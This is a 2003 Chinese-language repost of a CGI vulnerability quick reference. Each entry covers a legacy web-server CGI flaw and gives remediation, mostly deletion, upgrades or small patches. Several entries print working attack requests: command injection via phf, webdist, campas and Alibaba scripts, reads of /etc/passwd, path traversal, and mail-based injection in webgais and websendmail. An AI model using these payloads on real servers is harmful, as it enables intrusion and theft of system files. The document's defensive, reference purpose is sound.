CGI安全漏洞資料速查v1.0(上) - 中國WEB開發者網絡 (http://www.webasp.net) -- 技術教程 (http://www.webasp.net/article/) --- CGI安全漏洞資料速查v1.0(上) (http://www.webasp.net/article/8/7760.htm) |
| -- 作者:未知 -- 發佈日期: 2003-09-13 |
| CGI安全漏洞資料速查v1.0 ################################################################ #如有任何安全組織或個人願意無嘗對此文進行長期的、不間斷地維護、 更新或更改。請自行隨便,不必與我商討.但要求是成果必須完全地向 internet公開。任何行為的私藏都是不受歡迎的。 #本文歡迎轉摘.但請保持這些聲明。 #如有任何問題或建議,請mailto:iwillsurewin@163.net ################################################################ 類型:攻擊型 名字:phf 風險等級:中 描述:在NCSA或者Apache(1.1.1版本以內)非商業版本的WebServer中 有一段程序util.c,允許黑客以root身份執行任何一個指令: http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here 建議:無 解決方法:把Apachewebserver升級到1.1.1以上,或者將NCSAwebserver 升級到最新版本 類型:攻擊型 名字:wguset.exe 風險等級:中 描述:如果您使用NT做為您的WebServer的操作系統,而且wguest.exe存 在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬 盤上所有USR_用戶能閱讀的文件 建議:將wguset.exe從你的Web目錄移走或刪除 解決方法:將wguset.exe從你的Web目錄移走或刪除 類型:攻擊型 名字:rguset.exe 風險等級:中 描述:如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存 在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬 盤上所有USR_用戶能閱讀的文件 建議:將rguset.exe從你的Web目錄移走或刪除 解決方法:將rguset.exe從你的Web目錄移走或刪除 類型:攻擊型 名字:perl.exe 風險等級:低 描述:在cgi-bin執行目錄下存在perl.exe,這屬於嚴重的配置錯誤。黑客 可以在perl.exe後面加一串指令,利用瀏覽器在server上執行任何 腳本程序 建議:perl.exe是放在任何帶執行權限的web目錄下都是不安全的 解決方法:在web目錄下移除perl.exe這個程序. 類型:攻擊型 名字:shtml.exe 風險等級:低 描述:如果您使用FrontPage作為您的WebServer,那麼入侵者能夠利用 IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事 建議:將shtml.exe從你的Web目錄移走或刪除 解決方法:將shtml.exe從你的Web目錄移走或刪除 類型:攻擊型 名字:wwwboard.pl 風險等級:低 描述:wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊 建議:如無必要可以刪除該文件 解決方法:對get_variables的子程序中的下面這段: if($FORM{'followup'}){$followup="1"; @followup_num=split(/,/,$FORM{'followup'}); $num_followups=@followups=@followup_num; $last_message=pop(@followups); $origdate="$FORM{'origdate'}"; $origname="$FORM{'origname'}"; $origsubject="$FORM{'origsubject'}";} 替換為: if($FORM{'followup'}){ $followup="1"; @followup_num=split(/,/,$FORM{'followup'}); $num_followups=@followups=@followup_num; $last_message=pop(@followups); $origdate="$FORM{'origdate'}"; $origname="$FORM{'origname'}"; $origsubject="$FORM{'origsubject'}"; #WWWBoardBombPatch #WrittenBy:SamuelSparlingsparling@slip.net) $fn=0; while($fn<$num_followups) { $cur_fup=@followups$fn]; $dfn=0; foreach$fm(@followups) { if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn) { &error(board_bomb); } $dfn++; } $fn++; } #EndWWWBoardBombPatch } 類型:攻擊型 名字:uploader.exe 風險等級:中 描述:如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用 uploader.exe上傳任何文件 建議:將uploader.exe從你的Web目錄移走或刪除 解決方法:將uploader.exe從你的Web目錄移走或刪除 類型:攻擊型 名字:bdir.htr 風險等級:高 描述:如果您使用NT做為您的WebServer的操作系統,而且bdir.htr存在 於您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上 無止境的創建ODBC數據庫,並生成一些可執行的文件。 建議:將bdir.htr從你的Web目錄移走或刪除 解決方法:將bdir.htr從你的Web目錄移走或刪除 類型:攻擊型 名字:Count.cgi 風險等級:高 描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出 錯誤,允許入侵者無須登錄而遠程執行任何指令。 建議:如無必要可以刪除該文件 解決方法:將wwwcount升級到2.4或者以上 類型:攻擊型 名字:test-cgi 風險等級:高 描述:test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息 建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限 解決方法:刪除test-cgi文件 類型:攻擊型 名字:nph-test-cgi 風險等級:高 描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息 建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限 解決方法:刪除nph-test-cgi文件 類型:攻擊型 名字:php.cgi 風險等級:低 描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系 統文件可以被入侵者讀取的漏洞 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除php.cgi程序是最好的辦法 類型:攻擊型 名字:handler 風險等級:低 描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出 錯誤,允許入侵者在server上遠程執行一段程序: telnettarget.machine.com80 GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download HTTP/1.0 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除handler文件 類型:攻擊型 名字:webgais 風險等級:高 描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個 毛病使入侵者可以繞過程序的安全機制,執行系統命令: POST/cgi-bin/webgaisHTTP/1.0 Content-length:85(replacethiswiththeactuallengthof the"exploit"line) telnettarget.machine.com80query=';mail+you\@your.host 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除webgais文件 類型:攻擊型 名字:websendmail 風險等級:高 描述:/cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令: telnettarget.machine.com80 POST/cgi-bin/websendmailHTTP/1.0 Content-length:xxx(shouldbereplacedwiththeactual lengthofthestringpassedtotheserver,inthiscase xxx=90) receiver=;mail+your_address\@somewhere.org &content=a 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符 一般用戶:刪除websendmail文件 類型:攻擊型 名字:webdist.cgi 風險等級:高 描述:對於Irix6.2和6.3平台,/cgi-bin目錄下的webdist.cgi有一個弱點 允許入侵者無須登錄而在系統上執行任何指令: http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi 類型:攻擊型 名字:faxsurvey 風險等級:高 描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無 須登錄就能在服務器執行指令:http://joepc.linux.elsewhere.org/ cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin/faxsurvey文件 類型:攻擊型 名字:htmlscript 風險等級:中 描述:安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使 入侵者可以查看服務器上的任何文件: http://www.vulnerable.server.com/cgi-bin/htmlscript?../../ ../../etc/passwd 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到 3.0以上 類型:攻擊型 名字:pfdisplay 風險等級:中 描述:在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序 允許入侵者非法查看服務器上的文件 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin/pfdisplay文件,或者打補丁,補丁可以去 sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載: Filename:README.patch.3018 Algorithm#1(sum-r):3795511README.patch.3018 Algorithm#2(sum):1545511README.patch.3018 MD5checksum:1169EB51D75E0794C64C2C1FD6211B69 Filename:patchSG0003018 Algorithm#1(sum-r):016792patchSG0003018 Algorithm#2(sum):128762patchSG0003018 MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8 Filename:patchSG0003018.idb Algorithm#1(sum-r):013392patchSG0003018.idb Algorithm#2(sum):2512patchSG0003018.idb MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB Filename:patchSG0003018.performer_tools_man Algorithm#1(sum-r):102018patchSG0003018.per- -former_tools_man Algorithm#2(sum):31448patchSG0003018.performer_t- -ools_man MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29 Filename:patchSG0003018.performer_tools_sw Algorithm#1(sum-r):4847418patchSG0003018.perform- -er_tools_sw Algorithm#2(sum):2817618patchSG0003018.performer_ tools_sw MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F 類型:攻擊型 名字:www-sql 風險等級:中 描述:www-sql存在於/cgi-bin/目錄下,這將導致入侵可以越權訪問被保 護的文件 建議:最好刪除www-sql文件 解決方法:#ifPHPFASTCGI while(FCGI_Accept()>=0) { #endif s=getenv("REDIRECT_STATUS"); if(!s){ puts("Content-type:text/plain\r\n\r\nPHP/FIdetected aninternalerror.Pleaseinformsa@hogia.netofwhat youjustdid.\n"); exit(1); } s=getenv("PATH_TRANSLATED"); 類型:攻擊型 名字:view-source 風險等級:高 描述:在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使 入侵者可以查看服務器上的任何文件 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin目錄下的viewsource程序 類型:攻擊型 名字:campas 風險等級:高 描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看 server上的重要文件: telnetwww.xxxx.net80 Trying200.xx.xx.xx... Connectedtovenus.xxxx.net Escapecharacteris'^]'. GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin目錄下的campas程序 類型:攻擊型 名字:aglimpse 風險等級:高 描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登 錄而隨意執行任何指令 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin目錄下的aglimpse程序 類型:攻擊型 名字:AT-admin.cgi 風險等級:中 描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允 許普通用戶完全控制整個系統 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序 類型:攻擊型 名字:finger 風險等級:中 描述:這個位於/cgi-bin下的finger程序,可以查看其它服務器的信息, 但是如果將參數改成本機,本機上的帳號信息將暴露無遺: /cgi-bin/finger?@localhost 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin目錄下的finger程序 類型:攻擊型 名字:webwho.pl 風險等級:中 描述:如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那麼入侵 者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。 建議:將webwho.pl從您的Web目錄中刪除或移走 解決方法:將webwho.pl從您的Web目錄中刪除或移走 類型:攻擊型 名字:w3-msql 風險等級:低 描述:MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用於以 httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf() 函數引起的。 建議:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文 件刪除或移走 解決方法:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql 文件刪除或移走.或使用以下補丁。 補丁: ------w3-msql.patch--------- 410c410 scanf("%s",boundary); <br>--- <scanf("%128s",boundary);> 418c418 <strcat(var,buffer); <strncat(var,buffer,sizeof(buffer)); 428c428 <scanf("Content-Type:%s",buffer);> <scanf("Content-Type:%15360s",buffer);> ------w3-msql.patch--------- 類型:攻擊型 名字:NetscapeFastTrackserver2.0.1a 風險等級:中 描述:UnixWare7.1附帶的NetscapeFastTrackserver2.0.1a存在一個遠程 緩衝區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供 UnixWare文檔。如果向該服務器傳送一個長度超過367字符的GET請 求,會使緩衝區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權 限執行。 建議:臨時解決方法是關閉NetscapeFastTrack服務器 解決方法:臨時解決方法是關閉NetscapeFastTrack服務器。 類型:攻擊型 名字:AnyForm.cgi 風險等級:高 描述:位於cgi-bin目錄下的AnyForm.cgi程序,是用於簡單表單通過郵件 傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用, 在server上執行任何指令. 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:建議升級該cgi程序,或者刪除該文件 類型:攻擊型 名字:whois.cgi 風險等級:低 描述:在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括: WhoisInternicLookup-version:1.02 CCWhois-Version:1.0 Matt'sWhois-Version:1 他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任 意的代碼 建議:將在您Web目錄中問whois.cgi刪除或移走 解決方法:將在您Web目錄中問whois.cgi刪除或移走 類型:攻擊型 名字:environ.cgi 風險等級:中 描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi 程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些 文件。 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:建議升級該cgi程序,或者刪除該文件 類型:攻擊型 名字:wrap 風險等級:中 描述:/cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件 的非法訪問,如: http://host/cgi-bin/wrap?/../../../../../etc 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin/wrap文件 類型:攻擊型 名字:edit.pl 風險等級:中 描述:/cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用 戶的配置情況: http://www.sitetracker.com/cgi-bin/edit.pl?account=&password= 建議:建議審核cgi-bin目錄,避免有不必要的程序存在 解決方法:刪除/cgi-bin/edit.pl文件 類型:攻擊型 名字:service.pwd 風險等級:中 描述:UNix系統的http://www.hostname.com/_vti_pvt/service.pwd可讀, 將暴露用戶密碼信息 建議:建議刪除 解決方法:chownrootservice.pwd chmod700service.pwd 類型:攻擊型 名字:administrators.pwd 風險等級:中 描述:UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd 可讀,將暴露用戶密碼信息 建議:建議刪除 解決方法:chownrootadministrators.pwd chmod700administrators.pwd 相關連接: 類型:攻擊型 名字:users.pwd 風險等級:中 描述:UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀, 將暴露用戶密碼信息 建議:建議刪除 解決方法:chownrootusers.pwd chmod700users.pwd 類型:攻擊型 名字:authors.pwd 風險等級:中 描述:UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀, 將暴露用戶密碼信息 建議:建議刪除 解決方法:chownrootauthors.pwd chmod700authors.pwd 類型:攻擊型 名字:visadmin.exe 風險等級:中 描述:在OmniHTTPdWebServer的cgi-bin目錄下存在這個文件visadmin.exe, 那麼攻擊者只要輸入下面的命令: http://omni.server/cgi-bin/visadmin.exe?user=guest數分鐘之 後服務器的硬盤將會被撐滿 建議:建議刪除 解決方法:把visadmin.exe從cgi-bin目錄中刪除 類型:攻擊型 名字:get32.exe 風險等級:高 描述:Alibaba的webserver,其cgi-bin目錄存在get32.exe這個程序,允 許入侵者任意執行一條指令: http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com 建議:建議刪除 解決方法:把GET32.exe從cgi-bin目錄中刪除 類型:攻擊型 名字:alibaba.pl 風險等級:高 描述:Alibaba的webserver,其cgi-bin目錄存在alibaba.pl這個程序,允 許入侵者任意執行一條指令: http://www.victim.com/cgi-bin/alibaba.pl|dir 建議:建議刪除 解決方法:把alibaba.pl從cgi-bin目錄中刪除 類型:攻擊型 名字:tst.bat 風險等級:高 描述:Alibaba的webserver,其cgi-bin目錄存在tst.bat這個程序,允許 入侵者任意執行一條指令: http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini 建議:建議刪除 解決方法:把tst.bat從cgi-bin目錄中刪除 類型:攻擊型 名字:fpcount.exe 風險等級:低 描述:如果您使用NT作為您的WebServer的操作平台,並只安裝了SP3補丁, 那麼入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕 訪問。 建議:將在您Web目錄中的fpcount.exe刪除或移走 解決方法:將在您Web目錄中的fpcount.exe刪除或移走 類型:攻擊型 名字:openfile.cfm 風險等級:低 描述:如果在您的Web目錄中含有 /cfdocs/expeval/exprcalc.cfm /cfdocs/expeval/sendmail.cfm /cfdocs/expeval/eval.cfm /cfdocs/expeval/openfile.cfm /cfdocs/expeval/displayopenedfile.cfm /cfdocs/exampleapp/email/getfile.cfm /cfdocs/exampleapp/publish/admin/addcontent.cfm 這些文件,那麼入侵者可能能夠利用它們讀到您系統上的所有文件 建議:將在您Web目錄中的openfile.cfm刪除或移走 解決方法:將在您Web目錄中的openfile.cfm刪除或移走 |
| webasp.net |